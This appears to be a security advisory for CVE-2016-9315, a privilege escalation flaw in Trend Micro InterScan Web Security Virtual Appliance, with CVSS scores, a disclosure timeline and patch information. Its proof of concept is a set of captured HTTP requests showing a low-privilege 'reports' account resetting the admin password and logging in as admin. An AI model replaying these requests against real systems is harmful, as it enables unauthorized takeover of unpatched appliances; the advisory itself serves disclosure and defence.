4 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:S/C:P/I:N/A:N
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
0.003 Low
EPSS
Percentile
68.8%
Vulnerability Details
Affected Vendor: Trendmicro
Affected Product: InterScan Web Security Virtual Appliance
Affected Version: OS Version 3.5.1321.el6.x86_64; Application
Version 6.5-SP2_Build_Linux_1548
Platform: Embedded Linux
CWE Classification: CWE-269: Improper Privilege Management
Impact: Privilege Escalation
Attack vector: HTTP
CVE-ID: CVE-2016-9315
Vulnerability Description
Any authenticated user can execute administrative functionality
Technical Description
POST /uilogonsubmit.jsp HTTP/1.1
Host: 1.3.3.8:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://1.3.3.8:8443/logon.jsp
Cookie: JSESSIONID=FA0756E428016DE2FCABF4DF1A91D8A9
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
wherefrom=&wronglogon=no&uid=reports&passwd=reports&pwd=Log+On
HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Location: https://1.3.3.8:8443/index.jsp?CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK&summary_scan
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Tue, 25 Oct 2016 15:02:24 GMT
Connection: close
POST /servlet/com.trend.iwss.gui.servlet.updateaccountadministration HTTP/1.1
Host: 1.3.3.8:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://1.3.3.8:8443/login_account_add_modify.jsp?CSRFGuardToken=9RN5D8EPS3MS4R5BCQMR3KE4SHPVCMZV&op=review&uid=admin
Cookie: JSESSIONID=FA0756E428016DE2FCABF4DF1A91D8A9
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 280
CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK&accountop=review&allaccount=admin&allaccount=auditor&allaccount=reports&accountname=admin&commonname=admin&accounttype=0&password_changed=true&PASS1=korelogic2&PASS2=korelogic2&description=Master+Administrator&role_select=0&roleid=0
HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Location: https://1.3.3.8:8443/login_accounts.jsp?CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK
Content-Length: 0
Date: Tue, 25 Oct 2016 15:03:37 GMT
Connection: close
POST /uilogonsubmit.jsp HTTP/1.1
Host: 1.3.3.8:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://1.3.3.8:8443/logout.jsp?CSRFGuardToken=VS0DHVK4Q9T7GJF0N08812Y5FNTNT67M
Cookie: JSESSIONID=6903A112B76F642A05573990BB3057DB
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
uid=admin&passwd=korelogic2
HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Location: https://1.3.3.8:8443/index.jsp?CSRFGuardToken=IDVSTBAEVTSQOP6GJWZI3BDZZVBKAYW4&summary_scan
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Tue, 25 Oct 2016 15:03:54 GMT
Connection: close
Mitigation and Remediation Recommendation
The vendor has issued a patch for this vulnerability in Version
6.5 CP 1737. Security advisory and link to the patched version
available at:
Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.
Disclosure Timeline
2016.12.12 - KoreLogic sends vulnerability report and PoC to
Trendmicro.
2016.12.12 - Trendmicro acknowledges receipt of report.
2017.01.11 - Trendmicro informs KoreLogic that the patch to
this and other KoreLogic reported issues will
likely be available after the 45 business day
deadline (2017.02.16).
2017.02.06 - Trendmicro informs KoreLogic that the patched
version will be available by 2017.02.14.
2017.02.14 - Trendmicro security advisory released.
2017.02.15 - KoreLogic public disclosure.
Proof of Concept
See 3. Technical Description.
CPE | Name | Operator | Version |
---|---|---|---|
trendmicro interscan os | le | 3.5.1321.el6.x86_64 | |
trendmicro interscan application | le | 6.5-SP2_Build_Linux_1548 |
4 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:S/C:P/I:N/A:N
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
0.003 Low
EPSS
Percentile
68.8%